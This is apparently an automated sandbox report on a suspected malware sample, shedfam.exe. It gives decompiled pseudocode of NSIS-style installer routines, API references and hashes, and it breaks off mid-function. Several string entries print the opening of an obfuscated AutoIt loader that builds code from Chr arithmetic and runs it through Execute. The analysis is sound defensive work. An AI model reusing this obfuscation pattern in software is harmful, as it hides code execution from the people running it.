ReadFile.KERNELBASE(Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,00004000,?,00000000,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FDC
WriteFile.KERNELBASE(00000000,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,?,000000FF,00000000,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FF4

Strings

Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655, xrefs: 00402FBC, 00402FD5, 00402FF0

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655
API String ID: 2113905535-3096212848
Opcode ID: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
Instruction ID: 82d5fff184c734a1787b3ae727349c02325da9e894cdbedb842e9025a389ee8f
Opcode Fuzzy Hash: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
Instruction Fuzzy Hash: 9A313871501209FBCF21DF55DD44AAF3BB8EB44765F20403AF904A6291D3389F91DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403059 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403059(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417124; // 0x11b837
				_t37 = _t35 -  *0x40b090 + _a4;
				 *0x423f8c = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BE9(1);
					return 0;
				}
				E00403207( *0x41f134);
				SetFilePointer( *0x409018,  *0x40b090, 0, 0); // executed
				 *0x41f130 = _t37;
				 *0x417120 = 0;
				while(1) {
					_t12 =  *0x417128; // 0xdc096
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f134;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031D5(0x413120, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f134 =  *0x41f134 + _t34;
					 *0x40b0b0 = 0x413120;
					 *0x40b0b4 = _t34;
					L6:
					L6:
					if( *0x423f90 != 0 &&  *0x424020 == 0) {
						 *0x417120 =  *0x41f130 -  *0x417124 - _a4 +  *0x40b090;
						E00402BE9(0);
					}
					 *0x40b0b8 = 0x40b120;
					 *0x40b0bc = 0x8000; // executed
					_t16 = E00406184(0x40b098); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40b0b8; // 0x411ec5
					_t40 = _t39 - 0x40b120;
					if(_t40 == 0) {
						__eflags =  *0x40b0b4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417124; // 0x11b837
						if(_t18 -  *0x40b090 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b120, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40b090 =  *0x40b090 + _t40;
						_t53 =  *0x40b0b4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x0040305d
0x0040306a
0x0040307d
0x00403082
0x004031c3
0x004031c5
0x00000000
0x004031cb
0x0040308e
0x004030a1
0x004030a7
0x004030ad
0x004030b8
0x004030b8
0x004030bd
0x004030c2
0x004030ca
0x004030cc
0x004030cc
0x004030d5
0x004030dc
0x00000000
0x00000000
0x004030e2
0x004030e8
0x004030ee
0x00000000
0x004030f4
0x004030fa
0x0040311a
0x0040311f
0x00403124
0x0040312a
0x00403130
0x0040313a
0x00403141
0x00000000
0x00000000
0x00403143
0x00403149
0x0040314b
0x0040317f
0x00403185
0x00000000
0x00000000
0x00403187
0x00403189
0x00000000
0x00000000
0x0040318b
0x0040318b
0x0040319e
0x00000000
0x00000000
0x004031ad
0x00000000
0x004031ad
0x0040315b
0x00403163
0x004031ba
0x004031c0
0x004031c0
0x00000000
0x0040316b
0x0040316b
0x00403171
0x00403177
0x00000000
0x00000000
0x00000000
0x0040317d
0x004031be
0x004031be
0x00000000
0x004031be
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040306E

Part of subcall function 00403207: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000), ref: 004030A1
WriteFile.KERNELBASE(0040B120,00411EC5,00000000,00000000,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 0040315B
SetFilePointer.KERNELBASE(0011B837,00000000,00000000,Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 004031AD

Strings

Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655, xrefs: 004030CE, 004030D4

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655
API String ID: 2146148272-3096212848
Opcode ID: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
Instruction ID: 4dd4975a9f59093c3e0d8581b597c69eeb1c8b76cfa1fe2ad7fe21498de3e5f3
Opcode Fuzzy Hash: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
Instruction Fuzzy Hash: 16418D72518201AFC7109F29EE849673BBDF708356714423BEA60B62E0D7386D098B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A0C(0xfffffff0);
				_t10 = E00405882(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405819(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x0040217a
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x004028a4
0x004028b0

APIs

Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405890
Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-501415292
Opcode ID: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
Instruction ID: d0a9f9296d723caddbd0f60560613e174b6a475f07d6f089b0aabedb845a292b
Opcode Fuzzy Hash: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
Instruction Fuzzy Hash: CE010832908140AFD7217B755D4497F37B4DE91369724463FF891B22E1C63C0D42962E

Uniqueness

Uniqueness Score: -1.00%

Function 0040601D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040601D(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryA( &_v292); // executed
				return _t14;
			}

0x00406034
0x0040603d
0x0040603f
0x0040603f
0x00406043
0x00406055
0x0040604f
0x0040604f
0x0040604f
0x00406059
0x0040606d
0x0040607d
0x00406084

APIs

GetSystemDirectoryA.KERNEL32 ref: 00406034
wsprintfA.USER32 ref: 0040606D
LoadLibraryA.KERNELBASE(?), ref: 0040607D

Strings

%s%s.dll, xrefs: 00406067
\, xrefs: 00406045

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$\
API String ID: 2200240437-500877883
Opcode ID: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
Instruction ID: 31df564d024cf24b7dbdd433d12669610400c14d1f093727c30223d65afe2acb
Opcode Fuzzy Hash: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
Instruction Fuzzy Hash: CBF02B309441095BDF14E764DC0DEFB375CEB08344F0445BBA54BE10D2FA78E8698B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405A01 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A01(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x00405a05
0x00405a0b
0x00405a0c
0x00405a0c
0x00405a0d
0x00405a14
0x00405a1e
0x00405a2b
0x00405a2e
0x00405a36
0x00000000
0x00000000
0x00405a3a
0x00000000
0x00000000
0x00405a3c
0x00000000
0x00405a3c
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405A14
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A2E

Strings

nsa, xrefs: 00405A0D
"C:\Users\user\Desktop\shedfam.exe", xrefs: 00405A01
C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04, 00405A08

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\shedfam.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2428351063
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 5b0006bac455ae629d1f86c67115003f625ce1c04593d449782858effb37a924
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 81F020327082087BEB104E49EC44B9B7FADDFC5720F10C12BFA049A1C0C2B0A9488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406184 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406184(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BD6))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
